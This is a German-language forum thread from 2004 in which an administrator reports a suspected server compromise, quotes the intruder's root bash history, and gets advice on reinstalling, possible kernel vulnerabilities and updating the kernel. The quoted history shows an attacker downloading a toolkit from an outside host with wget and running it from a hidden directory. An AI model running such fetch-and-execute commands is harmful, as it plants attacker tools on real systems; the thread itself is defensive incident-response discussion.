Server gehackt?

Lesenswerte Artikel, Anleitungen und Diskussionen
as-n
Posts: 196
Joined: 2002-12-19 17:42

Server gehackt?

Post by as-n » 2004-02-03 08:38

Hallo,

eine rmeienr Server hat gestern den SSL Port eigenmächtig geändert.
In der Bash History fand ich das:

cat /etc/issue
wget users.volja.net/conso/fu.tgz
tar fu.tgz
tar xvf fu.tgz
cd .fuckZ
rm -rf " "
./start Kd9f4
exit

Sieht IMHO nach gehackt aus, oder?
Kann man das prüfen?

Ciao André

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Server gehackt?

Post by captaincrunch » 2004-02-03 08:48

Sieht IMHO nach gehackt aus, oder?
Ja
Kann man das prüfen?
Wenn derjenige gut war, wirst du da relativ wenig Chancen haben. Einfachste Methode: Nutzdaten sichern, Reinitialisierung.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

yt
Posts: 103
Joined: 2003-10-13 23:04
Location: Duisburg

Re: Server gehackt?

Post by yt » 2004-02-03 08:53

Gut war er nciht unbedingt, wenn er Spuren in der history hinterlässt. Aber der einzige Weg ist:

* Backup der Nutzdaten und Logs
* Reinitialisierung

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 08:54

Vielleicht finde ich heraus wer es war, wo in den Logs habe ich da etwaige Chancen eine IP zu finden etc?

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Server gehackt?

Post by captaincrunch » 2004-02-03 08:59

/var/log/*
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 09:04

Also überall, naja, ich werde erstmal den Server reinitalisieren und dann beschäftige ich mich mit den logs.

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Server gehackt?

Post by captaincrunch » 2004-02-03 09:08

Btw.: In wessen .bash_history hast du die Einträge gefunden?
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 09:09

In der von root, aber es gab dann noch einen user secteam mit root-Rechten.

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 11:52

Wie finde ich die Shwachstelle in meinem System, irgedn wie muss der Kerl ja rein gekommen sein.
Nessus hat bei der letzten Ã?berprüfung nichts schwerwiegendes entdeckt.
Ich möchte den gleichen Fehler nicht wieder machen, aber welcher war es?

Ciao
André

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Server gehackt?

Post by Joe User » 2004-02-03 12:40

Welche PHP-Scripte nutzt Du? War der Apache aktuell? Kernelversion?
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 12:56

Apache 1.3.28
Kernel war der der orginal SuSE8.1 Distri
An php war nur der osCommerce Shop drauf.

Ciao
André

checker
Posts: 113
Joined: 2003-06-09 13:17

Re: Server gehackt?

Post by checker » 2004-02-03 13:16

AS-N wrote: Kernel war der der orginal SuSE8.1 Distri


Ciao
André
Dürfte an dem kernel liegen oder hast du den immer schön gepacht?

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 13:22

Naja, das was fou4s und yast vorgeschlagen haben, aber ob da Kernel Patches dabei waren weiß ich ehrlich gesagt nicht.
Jedenfalls ist jede nacht fou4s gelaufen.

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-03 13:54

Also ich finde in den Logs gar nix, kann aber auch daran liegen, dass ich keine genauen Suchkriterien habe.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Server gehackt?

Post by Joe User » 2004-02-03 14:11

Vergiss die Logs, denen kannst Du nach einem ungebetenem Besuch genauso wenig trauen, wie den Binarys und Libs. Sicher die Nutzdaten (www,sqldump,config) und lass' die Kiste neu aufsetzen. Während der Reinitialisierung suchst Du nach Lücken in den PHP-Scripten und überdenkst die Notwendigkeit der von Dir angebotenen Dienste, sowie deren Konfiguration.
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-04 09:01

So, der Server läuft wieder, der Ke5nel war im Ã?brigen 2.4.23, daran kann es wohl nicht gelegen habne, oder?

Jetzt hätte ich noch webmin, nessus oder mysql im Verdacht, aber von allen waren die neusten Versionen drauf.

Macht yast jetzt eigentlich Kernelupdates automatisch?

Ciao
André

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Server gehackt?

Post by captaincrunch » 2004-02-04 09:06

der Ke5nel war im Ã?brigen 2.4.23, daran kann es wohl nicht gelegen habne, oder?
Natürlich kann es daran gelegen haben. Die mremap-Lücke betraf diese Version noch, wobei sämtliche Exploits, die diese Lücke ausnutzen auf einem sauber gewarteten System ziemlich schnell auffallen.

Was genau es war lässt sich für Außenstehende ohne genaue Kenntnis deines Setups allerdings nur erraten.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-04 09:11

Wenn der 2.4.23 noch betroffen ist, wie kann ich den dann patchen und auf welche Version und wo bekomme ich die her, auf der SuSE site finde ich nur ältere Versionen.

:?:

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-04 10:35

Ich habe jetzt versucht den Kernel manuell upzudaten, grob nach folgender Anleitung:

Code: Select all

#!/bin/bash
cd /usr/src
# Kernel downloaden (~25MB)
wget --passive-ftp 
ftp://ftp.de.kernel.org/pub/linux/kernel/v2.4/linux-2.4.22.tar.bz2
# Kernel entpacken
tar -xjf linux-2.4.22.tar.bz2
# Symlink erstellen
ln -s linux-2.4.22 linux
cd linux
# Aktuelle Kernel-Config abspeichern
gzip -dc /proc/config.gz >.config
# Kernel-Config 'aufr umen'
make oldconfig
# Kernel kompilieren (kann dauern)
make dep clean bzImage modules modules install
# Alten Kernel sichern
cp /boot/vmlinuz /boot/vmlinuz.old
# Neuen Kernel installieren
cp arch/i386/boot/bzImage /boot/vmlinuz
# Bootloader einrichten
# Wenn du LiLo verwendest einfach 'lilo' aufrufen.
# Wenn du Grub verwendest musst du nichts machen.
# Und zuletzt - Neustarten
Leider geht schon..

Code: Select all

cd linux
nicht, der Symlink ist zwar da, aber ...naja.
Also..

Code: Select all

cd linux-2.4.24
Dann..

Code: Select all

gzip -dc /proc/config.gz >.config
No such file or directory

Code: Select all

cp /boot/vmlinuz /boot/vmlinuz.old
No such file or directory

So bekomme ich das nicht hin :-(

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-04 13:41

Hallo,

also, es handelt sich um einen speziellen Kernel für den Server, für den es natürlich auch kein Update von SuSE gibt.
Die config.gz existiert auch nicht, da der Kernel ohne diese Option kompiliert wurde.
Kann ich die config.gz irgend wo anders rauslesen?

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-04 15:14

Hat keiner eine Idee?

Ciao
André

giffi
Posts: 140
Joined: 2003-05-17 14:52

Re: Server gehackt?

Post by giffi » 2004-02-04 16:43

Schau mal unter /boot nach da war jedenfalls bei mir eine config.

Giffi

as-n
Posts: 196
Joined: 2002-12-19 17:42

Re: Server gehackt?

Post by as-n » 2004-02-04 17:06

Hallo,

es gibt definitiv keine config. Der Kernel wurde ohne diese Option kompiliert, leider. :(

checker
Posts: 113
Joined: 2003-06-09 13:17

Re: Server gehackt?

Post by checker » 2004-02-04 19:27

AS-N wrote:Hallo,

es gibt definitiv keine config. Der Kernel wurde ohne diese Option kompiliert, leider. :(

??? Keine config datei und wie will man dann einstellungen bearbeiten und ändern? :roll: :!:

MfG checker

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Server gehackt?

Post by Joe User » 2004-02-04 21:08

Code: Select all

ls -alhR /boot
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.